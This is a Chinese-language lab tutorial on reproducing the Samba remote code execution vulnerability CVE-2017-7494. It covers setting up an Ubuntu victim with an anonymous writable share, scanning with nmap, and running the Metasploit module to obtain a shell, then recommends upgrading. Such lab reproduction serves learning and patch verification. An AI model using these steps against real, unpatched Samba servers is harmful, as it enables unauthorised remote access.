如何进行Samba远程代码执行漏洞CVE-2017-7494的复现
如何进行Samba远程代码执行漏洞CVE-2017-7494的复现,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。
0x00简介
Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置"NetBIOS over TCP/IP"使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。
0x01漏洞概述
2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本,,确认属于严重漏洞,可以造成远程代码执行。
0x02影响访问
Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本。
应理解为:也就是Samba 3.5.0之后的所有版本,在4.6.4/4.5.10/4.4.14修复了这个漏洞
0x03环境搭建
受害机:Ubuntu14.04 Samba版本:4.1.6 IP:192.168.3.12
攻击机:kali IP:192.168.3.6
1.使用命令在ubuntu安装samba
apt-get install samba
2.安装完成后使用以下命令查看版本
/usr/sbin/samba -V
3.安装完成后创建一个共享目录,并且赋予写权限,
mkdir /home/share
chmod 777 /home/share
4.然后修改配置文件/etc/samba/smb.conf,在配置文件最后添加如下内容:
[myshare]
comment=smb share test
browseable=yes #可读
writeable=yes #可写
path=/home/share #设置目录(上一步创建的共享目录)
public = yes #允许匿名登录
5.配置完成后启动服务
service smbd start //启动
0x04漏洞复现
1.使用nmap扫描查看开启的服务
nmap -p445 -sV 192.168.3.12
2.使用kali中的metasploit搜索漏洞该漏洞编号
search 2017-7494
3.然后选择此exp并进行配置IP
use 0
4.配置完成后run或者使用exploit执行,即可看到拿下shell
0x05修复建议
1.建议升级至最新版本或使用4.6.4/4.5.10/4.4.14其中某个版本
看完上述内容,你们掌握如何进行Samba远程代码执行漏洞CVE-2017-7494的复现的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注行业资讯频道,感谢各位的阅读!